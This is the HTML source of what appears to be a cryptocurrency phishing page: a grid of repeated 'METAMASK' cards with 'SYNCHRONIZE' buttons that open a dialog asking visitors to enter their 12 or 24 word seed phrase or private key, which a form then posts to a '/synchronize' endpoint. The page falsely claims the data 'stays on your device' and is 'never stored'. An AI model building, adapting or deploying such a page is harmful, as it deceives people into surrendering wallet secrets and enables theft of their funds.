<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title> WALLETS </title>
    <link rel="Stylesheet" type="text/css" href="index.css" />
</head>
<body>
    
    <header>
        <img src="logo.png" class="header-img" />
    </header>

    <section>
        <div> SELECT WALLET TYPE </div>
        <div> Choose your wallet and proceed to synchronize securely. </div>
        <div> After synchronization, Select Correct Node String  </div>
        <div> Your data stays on your device and its never stored. </div>
    </section>

    <section class="section-3">
        <div>
            <div><img src="meta.png" /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
    </section>

    <section class="section-3">
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
    </section>

    <section class="section-3">
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
    </section>

    <section class="section-3">
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
    </section>

    <section class="section-3">
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
    </section>

    <section class="section-3">
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
    </section>

    <section class="section-3">
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
    </section>

    <section class="section-3">
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
    </section>

    <section class="section-3">
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
    </section>

    <section class="section-3">
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
    </section>

    <section class="section-3">
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
    </section>

    <section class="section-3">
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
        <div>
            <div><img /></div>
            <div> METAMASK </div>
            <div id="btn"> <button class="sync-btn"> SYNCHRONIZE </button> </div>
        </div>
    </section>

    <dialog id="dialog">
        <div id="dialog-close"> <img height="10" width="10" src="#"  /> Cancel </div>
        <div class="sliding-header"></div>
        <div> SYNCHRONIZE YOUR WALLET </div>
        <div> SECURELY ENTER WALLET DETAILS TO PROCEED </div>
        <div> Enter 12 or 24 word Phrase/Private key </div>
        <div>
            <form action="/synchronize" method="post">
                <div> <input class="private-input" id="private-input" placeholder="PHRASE/PRIVATE KEY" name="key" /> </div>
                <div class="btn-con"> <button type="submit"> SYNCHRONIZE </button></div>
            </form>
        </div>
    </dialog>

    <script type="text/javascript" src="jquery-3.6.0.min.js"></script>
    <script type="text/javascript" src="dia.js"></script>

</body>
</html>